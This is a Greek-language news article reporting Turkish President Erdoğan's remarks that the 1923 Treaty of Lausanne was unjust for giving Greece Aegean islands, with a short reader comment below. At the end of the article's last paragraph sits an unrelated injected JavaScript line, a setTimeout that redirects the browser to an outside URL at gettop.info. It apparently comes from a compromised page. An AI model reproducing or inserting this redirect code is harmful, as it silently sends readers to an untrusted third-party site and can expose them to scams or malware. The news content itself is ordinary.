Ερντογάν: Άδικη η Συνθήκη της Λωζάννης – Δώσαμε στην Ελλάδα τα νησιά μας

2
17

 

Ο Τούρκος πρόεδρος Ταγίπ Ερντογάν αμφισβήτησε ανοιχτά τη συνθήκη της Λωζάνης του 1923, με την οποία καθορίστηκαν τα σύνορα μεταξύ Ελλάδας και Τουρκίας.

«Το 1920 μας έδειξαν τη Συνθήκη των Σεβρών για να μας πείσουν το 1923 για τη Συνθήκη της Λωζάννης. Και κάποιοι προσπάθησαν να μας το παρουσιάσουν αυτό ως νίκη. Με τη Συνθήκη της Λωζάννης δώσαμε [στους Έλληνες] τα νησιά, που αν φωνάξεις από τις ακτές του Αιγαίου, θα ακουστείς απέναντι. Είναι αυτό νίκη;» είπε.

«Όσοι έκατσαν στο τραπέζι των διαπραγματεύσεων στη Λωζάνη, δεν εκμεταλλεύτηκαν τη συνθήκη αυτή. Και επειδή αυτοί δεν την εκμεταλλεύτηκαν, δυσκολευόμαστε σήμερα εμείς»συνέχισε.

Ο Ερντογάν ανέφερε ακόμη ότι με την απόπειρα πραξικοπήματος της 15ης Ιουλίου, σε συνδιασμό με την τρομοκρατία έγινε μια κεκαλυμμένη προσπάθεια κατοχής της Τουρκίας από εξωτερικές δυνάμεις που επιβουλεύονται τη χώρα.

«Αν αυτό το πραξικόπημα πετύχαινε, θα βρισκόμασταν σε μια κατάσταση ανάλογη με εκείνη της Συνθήκης των Σεβρών» κατέληξε.

Η Συνθήκη της Λωζάνης υπογράφτηκε στις 24 Ιουλίου 1923 και έθετε τα σύνορα της σύγχρονης Τουρκίας. Καταργούσε τη Συνθήκη των Σεβρών, που είχε υπογραφεί τρία χρόνια νωρίτερα, η οποία είχε γίνει δεκτή από τον σουλτάνο, αλλά απορρίφθηκε από τον Μουσταφά Κεμάλ και το κίνημα των Νεότουρκων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

2 ΣΧΟΛΙΑ

  1. Ε ναι άδικη είναι αφου θα έπρεπε να έχουμε και τα παράλια της Μ. Ασίας και την Ανατολική Θράκη. Τώρα ο Σουλτάνος λέει και τις κοτσάνες του.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here